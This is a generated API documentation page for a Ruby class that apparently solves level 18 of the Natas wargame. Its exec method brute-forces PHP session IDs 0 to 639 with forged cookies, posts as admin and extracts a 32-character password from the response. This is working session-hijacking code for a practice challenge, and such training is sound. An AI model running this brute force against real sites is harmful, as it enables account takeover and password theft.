Class: NatasLevel18

Inherits:
NatasLevelBase show all
Defined in:
lib/natas.rb

Overview

Level 18

Constant Summary collapse

LEVEL = 
18
PAGE = 
'/'
MAX_ID = 
640

Constants inherited from NatasLevelBase

NatasLevelBase::HOST, NatasLevelBase::LOGIN, NatasLevelBase::PASSWORD_LENGTH, NatasLevelBase::PORT, NatasLevelBase::WEBPASS

Instance Attribute Summary

Attributes inherited from NatasLevelBase

#login, #password

Instance Method Summary collapse

Methods inherited from NatasLevelBase

#get, #initialize, #level, #post

Constructor Details

This class inherits a constructor from NatasLevelBase

Instance Method Details

#execObject 



560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
 
# File 'lib/natas.rb', line 560

def exec
  log('Bruteforcing PHPSESSID')
  MAX_ID.times do |id|
    data = post(
      PAGE,
      {
        'Cookie' => "PHPSESSID=#{id}"
      },
      {
        'username' => 'admin',
        'password' => ''
      }
    ).body
    match = %r(Password: (\w{32})</pre>).match(data)
    next unless match

    log("Found session: #{id}")
    return found(match[1])
  end

  not_found
end